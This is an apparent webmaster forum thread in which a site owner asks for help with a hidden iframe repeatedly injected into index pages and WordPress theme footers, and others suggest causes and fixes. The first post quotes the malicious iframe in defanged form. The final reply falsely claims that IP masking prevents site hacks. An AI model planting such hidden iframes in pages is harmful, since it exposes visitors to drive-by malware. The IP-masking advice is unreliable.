I have a hacker that keeps adding snippets of code to my index pages on one of my sites: i f r a m e src="h t t p:// ibalefo net/?click=4C4E2" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> or another one similar for php pages I caught it by checking on my site and AVAST went off. I removed the code the other day but its back today. I am looking for someone to help me out in preventing this a## hole from coming back. Thanks
Chances are this person isn't "coming back" but has put some code in a little deeper into your site and even if you get rid of some code there is probably something in there rewriting it automatically.... Did you make a backup of your site in the past that you can use to replace your existing site?
Sadly - not recently. The site actually is very simple. It has wordpress set up for about 30 articles and the home page runs on a php script supplied from the company that provides my affiliate offers. The home page is simple to replace so the rest would be the simple wordpress setup. This is a creditcard site (in my sig) This guy placed the code interestingly in the footer of each additional wordpress theme's index file as well in case I changed themes so I figured he did it by hand?
In my opinion, maybe your hosting provider was compromised. Please report it, so they can check it. If this is the case, you can't really prevent it, but I advise you to change your passwords.
Ok, you need to get a security specialist to investigate further. You need to change passwords for your control panel, ftp accounts. You also need to ensure ownership/permissions are correct within your account. The account will most likely have been compromised by one of the following; - FTP/cPanel account login info's harvested via bots - FTP account has been compromised. - host provider has been compromised. - insecure script within your account allowing scripts/shells to be uploaded.
You guys are more expert than I am, but alot of the threads are hack related. You should of had the software installed to hide your IP address. That's what I use. Never had a problem. I use a flash drive for IP masking. If they can't see you, they can't hack you.